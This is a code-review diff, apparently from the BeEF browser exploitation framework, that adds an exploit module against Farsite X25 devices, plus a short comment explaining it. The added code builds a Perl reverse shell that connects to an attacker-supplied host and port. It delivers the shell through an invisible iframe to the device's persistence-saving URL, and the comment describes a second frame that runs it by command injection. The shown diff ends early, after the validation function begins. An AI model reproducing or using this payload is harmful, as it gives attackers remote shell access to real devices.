modules/exploits/farsite_x25_remote_shell/command.js

```diff
@@ -0,0 +1,39 @@
+//
+beef.execute(function() {
+
+  var rhost = '<%= @rhost %>'; 
+  var scheme = '<%= @scheme %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+
+
+  writefile = function() {
+    var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
+    revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
+    revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
+    //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
+    var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
+    var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
+    //About to hit uri
+    x25w_<%= @command_id %>.setAttribute('src', uri);
+  };
+
+  validate = function() {
```

Comment:
Yes, the x25w frame hits the save persistence url which writes the reverse shell to a local file, the x25e frame then executes that file using a cmd injection. Cmd injection without is possible but bad chars means this method works well for this lazy exploit writer